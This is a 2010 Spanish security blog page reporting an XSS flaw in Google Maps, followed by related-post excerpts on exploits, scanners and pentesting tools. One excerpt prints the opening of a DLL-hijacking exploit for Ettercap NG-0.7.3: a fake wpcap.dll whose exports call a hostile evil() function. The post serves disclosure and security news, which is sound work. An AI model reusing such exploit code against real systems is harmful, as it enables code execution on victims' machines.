¡La Informática al límite!
Google vulnerable a XSS – Inyección de código HTML
Los chicos de InSecurity.Ro han descubierto una vulnerabilidad del tipo XSS en Google Maps ( maps.google.com ).
Ya ha sido reportada y se espera que en el transcurso del día sea solucionada.
El parámetro afectado y vulnerable es:
Definir ubicación predeterminada ( Change default location )
Captura -mía-
| Este artículo fue publicado por WindHack el 1 diciembre, 2010 a las 11:00 AM, y está archivado en Inseguridad Informática, Noticias. Sigue las respuestas a esta entrada a través de RSS 2.0. Puedes dejar un comentario o enviar un trackback desde tu propio sitio. |
Aún no hay comentarios.
Aún no hay trackbacks.
Grave vulnerabilidad en PHP-CGI
hace 1 semana - No hay comentarios
Grave vulnerabilidad en PHP-CGI Importancia: 5 – Crítica Fecha de publicación: 03/05/2012 Recursos afectados Servidores web con PHP ejecutándose como CGI. Descripción Posibilita el paso de parámetros al intérprete, lo que permite la ejecución de código arbitrario y la revelación de información confidencial. Solución Ya existen módulos de la herramienta de pentesting y hacking metasploit…
Ettercap NG-0.7.3 DLL Exploit
hace 1 mes - No hay comentarios
———————————————————————- Exploit Title: Ettercap NG-0.7.3 DLL hijacking (wpcap.dll) Autor: $ slashdot Testeado: Windows XP SP3 Extensión Vulnerable: .pcap ———————————————————————- #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void pcap_findalldevs() { evil(); } DLLIMPORT void pcap_close() { evil(); } DLLIMPORT void pcap_compile() { evil(); } DLLIMPORT void pcap_datalink() { evil(); } DLLIMPORT void pcap_datalink_val_to_description()…
¡Lanzado el Nmap 5.51!
hace 5 meses - No hay comentarios
Hace poco salió la ultima versión de Nmap, una de las herramientas que cualquier persona interesada por la seguridad informática debe conocer y utilizar. Algunas de las mejoras en la versión 5.51 Soporte para el protocolo Gopher Añadidos 177 NSE scripts 2,982 OS fingerprints añadidos 7,319 firmas de versiones agregadas Inclusión de la nueva herramienta NCAT y…
IntyPedia: Enciclopedia visual de la seguridad de la información
hace 5 meses - No hay comentarios
Intypedia es una enciclopedia visual de la seguridad de la información. El proyecto persigue difundir conocimientos sobre esta temática mediante lecciones en vídeo desarrolladas por destacados expertos usando un lenguaje accesible por un amplio público. La enciclopedia abarca temas como la criptografía, la seguridad en redes, el malware, la seguridad web, entre otros. Las lecciones publicadas…
Wapiti – Web application vulnerability scanner
hace 7 meses - 1 comentario
Wapiti es una aplicación que permite auditar la seguridad de sus aplicaciones web. No estudia el código fuente de la aplicación, pero va a escanear las páginas web de la webapp, en busca de scripts y de formas en las que se puedan inyectar datos. Posteriormente, Wapiti actúa como un fuzzer, inyectando payloads para ver si es vulnerable.…
Cross Site Scripting en jQuery 1.6
hace 8 meses - No hay comentarios
Se ha arreglado una vulnerabilidad que permitía realizar ataques Cross Site Scripting (XSS) en jQuery 1.6. La vulnerabilidad podía ser explotada en ciertos sitios que utilizaran la variable ‘location.hash’ en un contexto que no fuera el de Cascading Style Sheets (CSS). jQuery es una biblioteca o framework javascript de software libre y código abierto. Es compatible con la mayoría…
Routerpwn, un framework para explotar dispositivos embebidos
hace 9 meses - No hay comentarios
Routerpwn.com es una aplicación web que permite y ayuda a explotar las vulnerabilidades en algunos routers. Es un conjunto de exploits listos para correr de forma local y remota. Está programado en JavaScript y HTML, y está optimizada para correr en SmartPhones y otros dispositivos de internet móviles. Es sólo un archivo HTML…
Inyección masiva de iframes a sitios de e-commerce
hace 9 meses - No hay comentarios
Un grupo de investigadores publicó en su blog, una nueva alerta de un ataque masivo a páginas con inyección de iframe activo, que estuvo particularmente focalizado en sitios de e-commerce. El ataque fue reportado con más de 90 mil páginas afectadas. El iframe permite la ejecución de contenido externo en la página que se está visitando.…
KromCAT: Convierte Chrome en una herramienta de auditorías
hace 10 meses - No hay comentarios
Hace algún tiempo os presenté Mantra. Un navegador basado en Mozilla Firefox y que se combinaba con el proyecto FireCAT para convertirlo en una potente herramienta para realizar auditorías de seguridad, pero como es mejor tener una lista de dónde elegir, hoy os vengo a presentar el proyecto KromCAT. KromCAT es un conjunto…
XSSPloit: Un escáner de vulnerabilidades XSS
hace 10 meses - 1 comentario
XSSploit es un escáner multi-plataforma de Cross-Site Scripting y exploiter escrito en Python. Se ha desarrollado para ayudar a descubrir y explotar las vulnerabilidades XSS en pruebas de penetración. Cuando se utiliza, XSSploit primero se arrastra todo el sitio web e identifica las formas encontradas. A continuación, analiza estas formas de detectar automáticamente las vulnerabilidades…
